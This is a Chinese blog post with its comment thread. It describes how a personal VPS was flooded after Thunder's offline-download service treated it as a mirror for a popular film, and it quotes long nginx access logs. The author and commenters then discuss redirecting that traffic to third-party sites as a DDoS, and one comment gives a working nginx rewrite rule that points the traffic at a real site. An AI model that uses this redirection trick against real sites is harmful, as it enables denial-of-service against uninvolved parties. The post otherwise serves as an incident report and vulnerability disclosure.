原文作者:imlonghao,原文标题:迅雷云你伤不起啊
[ 本文目录 ]
起因
上周,某部比较出名的电影据说出了完整版非枪版,于是在某天堂找到了下载地址。但是下载地址已经失效,朋友给了个迅雷的会员号,于是就打算看看是不是枪版。把某天堂的地址拉了进去,果断找到了已经被迅雷缓存掉了。于是想用迅雷的快速播放功能,但显示源地址错误,无法快速播放。
由于博客上vps剩余流量充足,才用了不到3G/500G,于是就用vps把片子下载了,然后用迅雷的离线离线我博客的地址。
在迅雷离线的时候,查看vps的流出流量都比较稳定,基本上了离线页面显示的下载速度是相同的。
一切还好,很快就离线好了,此时vps没发现什么异常。
有点问题
用快速播放简单看了后,好吧不是枪版,比较满意,于是就开始用家里电脑下载了。
顺便还开了加速通道。。。。。
发现有点问题,一开始下载,网站马上就打不开了,一暂停,又马上恢复了。
当初以为是迅雷占满了vps 的流出,于是就没怎么管。
监控宝发来了服务器不可用的提醒,还是没管。
继续写作业了。
情况不对
写了会作业,大概过了半个多小时,目测电影已经下完了,用手机打开自己的网站,发现还是无法打开。
基本判断应该是出了什么事了,蛋疼地打开了SolusVM平台,我吓尿了。
瞬时的流出居然达到了40M/S,并且占用了我100G的流量…..
感觉到情况不太多,马上改上电脑开始处理。。。。
DDoS deflate战败
一直以来都有用DDoS deflate来防御小规模攻击的习惯
查了下iptables -L,封了的IP并不多,于是就把条件降低,但发现还是不行。
于是开始蛋疼的手动封,但发现效果还是不明显,重启了nginx依然网站无法打开。
cpu占用>85%
top了一下,多个php-fpm进程占用极高
检查特征
把日志拖了下来看看,蛋疼的由于系统时间出错,导致一开始没发现被攻击的特征。
当时时间14时左右,但是此时服务器时间才为9时
蛋疼……
直到我拖到最下面,发现了被大规模地访问视频的下载地址,后缀为rmvb
于是果断去nginx写规则把后缀为rmvb的给403掉
初见成效
ban掉*.rmvb的访问后,cpu一下子就下来了,恢复到了正常的状况。。
重启服务器后,服务器下的网站均恢复了正常访问。
蛋疼又来
上学昂上学昂……
今天回来的时候,发现尼玛突然多了4G的东西,查了一下,我跪了。
access.log这个伟大的日志文件占用的4G的空间。。。
让我情何以堪……….
改名之,重启nginx,重新生成了一个日志,拉下来一看。。。。。
部分日志
121.34.191.96 - - [24/May/2013:19:28:42 +0800] "GET /wp-content/uploads/2013/05/%5Bimlonghao-imlonghao.com%5D.%D6%C2%CE%D2%C3%C7%D6%D5%BD%AB%CA%C5%C8%A5%B5%C4%C7%E0%B4%BA.HD.1024x576.%B9%FA%D3%EF%D6%D0%D7%D6.rmvb HTTP/1.1" 403 564 "http://imlonghao.com/wp-content/uploads/2013/05" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; KB974488)" 180.110.85.117 - - [24/May/2013:19:28:42 +0800] "GET /wp-content/uploads/2013/05/[imlonghao-imlonghao.com].\xE8\x87\xB4\xE6\x88\x91\xE4\xBB\xAC\xE7\xBB\x88\xE5\xB0\x86\xE9\x80\x9D\xE5\x8E\xBB\xE7\x9A\x84\xE9\x9D\x92\xE6\x98\xA5.HD.1024x576.\xE5\x9B\xBD\xE8\xAF\xAD\xE4\xB8\xAD\xE5\xAD\x97.rmvb HTTP/1.1" 403 564 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; EIE10;ZHCNMSN)" 110.184.8.46 - - [24/May/2013:19:28:42 +0800] "GET /wp-content/uploads/2013/05/[imlonghao-imlonghao.com].\xE8\x87\xB4\xE6\x88\x91\xE4\xBB\xAC\xE7\xBB\x88\xE5\xB0\x86\xE9\x80\x9D\xE5\x8E\xBB\xE7\x9A\x84\xE9\x9D\x92\xE6\x98\xA5.HD.1024x576.\xE5\x9B\xBD\xE8\xAF\xAD\xE4\xB8\xAD\xE5\xAD\x97.rmvb HTTP/1.1" 403 564 "http://imlonghao.com/wp-content/uploads/2013/05" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0E; BRI/2; InfoPath.2; .NET4.0C; youxihe.1437; Media Center PC 6.0; MASP; youxihe.1437)" 61.187.6.123 - - [24/May/2013:19:28:42 +0800] "GET /wp-content/uploads/2013/05/[imlonghao-imlonghao.com].\xD6\xC2\xCE\xD2\xC3\xC7\xD6\xD5\xBD\xAB\xCA\xC5\xC8\xA5\xB5\xC4\xC7\xE0\xB4\xBA.HD.1024x576.\xB9\xFA\xD3\xEF\xD6\xD0\xD7\xD6.rmvb HTTP/1.1" 404 10110 "http://imlonghao.com/wp-content/uploads/2013/05" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 61.136.145.119 - - [24/May/2013:19:28:42 +0800] "GET /wp-content/uploads/2013/05/%5Bimlonghao-imlonghao.com%5D.%D6%C2%CE%D2%C3%C7%D6%D5%BD%AB%CA%C5%C8%A5%B5%C4%C7%E0%B4%BA.HD.1024x576.%B9%FA%D3%EF%D6%D0%D7%D6.rmvb HTTP/1.1" 404 10110 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; )" 218.108.168.178 - - [24/May/2013:19:28:43 +0800] "GET /wp-content/uploads/2013/05/%5Bimlonghao-imlonghao.com%5D.%E8%87%B4%E6%88%91%E4%BB%AC%E7%BB%88%E5%B0%86%E9%80%9D%E5%8E%BB%E7%9A%84%E9%9D%92%E6%98%A5.HD.1024x576.%E5%9B%BD%E8%AF%AD%E4%B8%AD%E5%AD%97.rmvb HTTP/1.1" 404 10110 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" 180.110.85.117 - - [24/May/2013:19:28:43 +0800] "GET /wp-content/uploads/2013/05/%5Bimlonghao-imlonghao.com%5D.%D6%C2%CE%D2%C3%C7%D6%D5%BD%AB%CA%C5%C8%A5%B5%C4%C7%E0%B4%BA.HD.1024x576.%B9%FA%D3%EF%D6%D0%D7%D6.rmvb HTTP/1.1" 403 564 "http://imlonghao.com/wp-content/uploads/2013/05" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; EIE10;ZHCNMSN)" 113.120.105.197 - - [24/May/2013:19:28:43 +0800] "GET /wp-content/uploads/2013/05/%5Bimlonghao-imlonghao.com%5D.%E8%87%B4%E6%88%91%E4%BB%AC%E7%BB%88%E5%B0%86%E9%80%9D%E5%8E%BB%E7%9A%84%E9%9D%92%E6%98%A5.HD.1024x576.%E5%9B%BD%E8%AF%AD%E4%B8%AD%E5%AD%97.rmvb HTTP/1.1" 404 10110 "http://imlonghao.com/wp-content/uploads/2013/05" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 59.56.115.134 - - [24/May/2013:19:28:43 +0800] "GET /wp-content/uploads/2013/05/%5Bimlonghao-imlonghao.com%5D.%D6%C2%CE%D2%C3%C7%D6%D5%BD%AB%CA%C5%C8%A5%B5%C4%C7%E0%B4%BA.HD.1024x576.%B9%FA%D3%EF%D6%D0%D7%D6.rmvb HTTP/1.1" 403 564 "http://imlonghao.com/wp-content/uploads/2013/05" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)" 61.131.97.40 - - [24/May/2013:19:28:43 +0800] "GET /wp-content/uploads/2013/05/%5Bimlonghao-imlonghao.com%5D.%D6%C2%CE%D2%C3%C7%D6%D5%BD%AB%CA%C5%C8%A5%B5%C4%C7%E0%B4%BA.HD.1024x576.%B9%FA%D3%EF%D6%D0%D7%D6.rmvb HTTP/1.1" 403 564 "http://imlonghao.com/wp-content/uploads/2013/05" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MATP; Media Center PC 6.0)" 114.83.179.112 - - [24/May/2013:19:28:43 +0800] "GET /wp-content/uploads/2013/05/[imlonghao-imlonghao.com].\xD6\xC2\xCE\xD2\xC3\xC7\xD6\xD5\xBD\xAB\xCA\xC5\xC8\xA5\xB5\xC4\xC7\xE0\xB4\xBA.HD.1024x576.\xB9\xFA\xD3\xEF\xD6\xD0\xD7\xD6.rmvb HTTP/1.1" 404 10110 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; youxihe.1577)"
及时返回了403,但是每秒N次不同地方来的流量你也伤不起啊是不是。。。。
暂时停用了日志功能…….
删掉了那个4G的大日志…..
部分日志下载:access
写在后面
想了想为什么会有那么多不同地方的机子访问这个地址,这个地址除了我自己知道之外没有告诉过别人。
应该就是迅雷的问题了,这部电影当时比较红,可能在离线下载的时候,我这边离线到的MD5与某天堂那边电影的MD5相同,因此迅雷就把我当成了源地址之一,但用户在离线服务器提出下载请求的时候,部分下载请求就会转移到我这边。
从日志中抓了个IP去查,某某宽带,应该不会是迅雷官方服务器,而是用户机子了..
当然,上面的只是我的猜测,有什么不对的地方也敬请指出讨论讨论…
现在这个地址每秒种也有N的请求,试想一下,将这个地址rewrite到某些自己不喜欢的站点,会造成CC攻击么?
假如上面试想成立的话,即用自己的vps离线一个热门的文件后,部分下载请求访问过来,rewrite到别人的站点,岂不是造成了一个很牛X的攻击?
某星人吐槽:
1#
imlonghao (imlonghao.com 友情链接) | 2013-05-24 21:36
试了试rewrite到别人的站,秒卡.....
2#
imlonghao (imlonghao.com 友情链接) | 2013-05-24 21:39
location ~* \.(rmvb)$ { rewrite ^/ http://www.wooyun.org/searchbug.php?q=%25; }
3#
insight-labs (Root Yourself in Success) | 2013-05-24 21:42
迅雷会follow rewrite么?
4#
insight-labs (Root Yourself in Success) | 2013-05-24 21:44
@imlonghao
不过不得不说这个思路极其淫荡
如果会follow rewrite的话,就有资本ddos gfw了……
5#
xsser (十根阳具有长短!!) | 2013-05-24 21:51
@imlonghao 尼玛
6#
imlonghao (imlonghao.com 友情链接) | 2013-05-24 22:02
@insight-labs 等我再开多个小网站看看日志就知道了。。
7#
imlonghao (imlonghao.com 友情链接) | 2013-05-24 22:09
@xsser @insight-labs
182.149.204.207 - - [24/May/2013:22:05:49 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" 219.151.158.144 - - [24/May/2013:22:05:50 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0" 182.149.204.207 - - [24/May/2013:22:05:50 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" 113.138.50.183 - - [24/May/2013:22:05:52 +0800] "GET / HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 27.153.68.113 - - [24/May/2013:22:05:52 +0800] "GET / HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" 182.149.204.207 - - [24/May/2013:22:05:53 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" 183.156.53.206 - - [24/May/2013:22:05:53 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0" 1.203.40.140 - - [24/May/2013:22:05:53 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0; InfoPath.2)" 219.151.158.144 - - [24/May/2013:22:05:53 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0" 123.149.228.64 - - [24/May/2013:22:05:54 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 183.157.115.3 - - [24/May/2013:22:05:54 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0" 111.172.197.39 - - [24/May/2013:22:05:54 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0" 182.149.204.207 - - [24/May/2013:22:05:56 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" 220.189.193.67 - - [24/May/2013:22:05:58 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; KB974487)" 183.157.115.3 - - [24/May/2013:22:05:58 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0" 121.237.2.43 - - [24/May/2013:22:05:58 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)" 222.80.175.25 - - [24/May/2013:22:05:58 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0)" 183.156.53.206 - - [24/May/2013:22:05:58 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0" 111.172.197.39 - - [24/May/2013:22:05:58 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0" 111.172.197.39 - - [24/May/2013:22:05:58 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0" 180.157.89.162 - - [24/May/2013:22:05:59 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; )" 113.76.33.74 - - [24/May/2013:22:05:59 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; MASP)" 61.185.178.173 - - [24/May/2013:22:05:59 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; 4399Box.1261; 4399Box.1261)" 113.86.145.177 - - [24/May/2013:22:06:01 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 718; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" 182.149.204.207 - - [24/May/2013:22:06:02 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" 182.149.204.207 - - [24/May/2013:22:06:02 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" 111.172.197.39 - - [24/May/2013:22:06:02 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0" 111.172.197.39 - - [24/May/2013:22:06:02 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0" 58.19.214.162 - - [24/May/2013:22:06:04 +0800] "GET / HTTP/1.1" 416 206 "-" "Mozilla/4.0" 61.153.0.130 - - [24/May/2013:22:06:04 +0800] "GET / HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)" 182.149.204.207 - - [24/May/2013:22:06:05 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" 183.156.53.206 - - [24/May/2013:22:06:06 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0" 182.149.204.207 - - [24/May/2013:22:06:06 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" 111.172.197.39 - - [24/May/2013:22:06:07 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0" 111.172.197.39 - - [24/May/2013:22:06:07 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0" 59.56.20.23 - - [24/May/2013:22:06:08 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" 112.65.211.100 - - [24/May/2013:22:06:08 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 9.0; qdesk 2.4.1263.203; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.2)" 115.206.20.133 - - [24/May/2013:22:06:08 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB7.4)" 182.149.204.207 - - [24/May/2013:22:06:09 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" 182.149.204.207 - - [24/May/2013:22:06:10 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" 111.172.197.39 - - [24/May/2013:22:06:11 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0" 111.172.197.39 - - [24/May/2013:22:06:11 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0" 14.147.86.62 - - [24/May/2013:22:06:11 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; QQPinyin 685; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)" 183.156.53.206 - - [24/May/2013:22:06:13 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0" 111.178.209.148 - - [24/May/2013:22:06:13 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" 182.149.204.207 - - [24/May/2013:22:06:14 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" 183.157.115.3 - - [24/May/2013:22:06:14 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0" 183.17.47.78 - - [24/May/2013:22:06:14 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" 58.19.214.162 - - [24/May/2013:22:06:15 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0" 27.188.231.155 - - [24/May/2013:22:06:16 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; MALN; .NET4.0E; Zune 4.7; InfoPath.1)" 111.172.197.39 - - [24/May/2013:22:06:16 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0" 58.48.1.93 - - [24/May/2013:22:06:17 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" 222.69.92.85 - - [24/May/2013:22:06:17 +0800] "GET / HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)" 61.153.149.166 - - [24/May/2013:22:06:17 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Apache; .NET CLR 2.0.50727)" 58.48.106.206 - - [24/May/2013:22:06:18 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; KB974488)" 113.65.198.144 - - [24/May/2013:22:06:18 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 182.149.204.207 - - [24/May/2013:22:06:18 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" 114.233.127.15 - - [24/May/2013:22:06:18 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)" 61.145.38.137 - - [24/May/2013:22:06:22 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)" 117.65.195.17 - - [24/May/2013:22:06:22 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 101.85.201.140 - - [24/May/2013:22:06:22 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0" 182.149.204.207 - - [24/May/2013:22:06:23 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" 111.172.197.39 - - [24/May/2013:22:06:24 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0" 222.70.224.156 - - [24/May/2013:22:06:24 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; MATP)" 116.11.198.33 - - [24/May/2013:22:06:25 +0800] "GET /?xl HTTP/1.1" 200 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Embedded Web Browser from: http://bsalsa.com/; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" 183.156.9.151 - - [24/May/2013:22:06:25 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3)" 116.11.198.33 - - [24/May/2013:22:06:25 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Embedded Web Browser from: http://bsalsa.com/; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" 116.11.198.33 - - [24/May/2013:22:06:25 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Embedded Web Browser from: http://bsalsa.com/; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" 116.11.198.33 - - [24/May/2013:22:06:26 +0800] "GET /?xl HTTP/1.1" 206 1541 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Embedded Web Browser from: http://bsalsa.com/; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" 1.194.117.98 - - [24/May/2013:22:06:26 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" 116.11.198.33 - - [24/May/2013:22:06:26 +0800] "GET /?xl HTTP/1.1" 206 1541 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Embedded Web Browser from: http://bsalsa.com/; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" 116.11.198.33 - - [24/May/2013:22:06:27 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Embedded Web Browser from: http://bsalsa.com/; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" 117.88.225.78 - - [24/May/2013:22:06:27 +0800] "GET / HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; KB974488)" 218.89.59.42 - - [24/May/2013:22:06:27 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0; BOIE9;ZHCN)" 116.11.198.33 - - [24/May/2013:22:06:27 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Embedded Web Browser from: http://bsalsa.com/; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" 111.172.197.39 - - [24/May/2013:22:06:28 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0" 183.9.16.122 - - [24/May/2013:22:06:28 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; BRI/2)" 58.19.214.162 - - [24/May/2013:22:06:29 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0" 182.149.204.207 - - [24/May/2013:22:06:29 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" 120.36.248.212 - - [24/May/2013:22:06:30 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 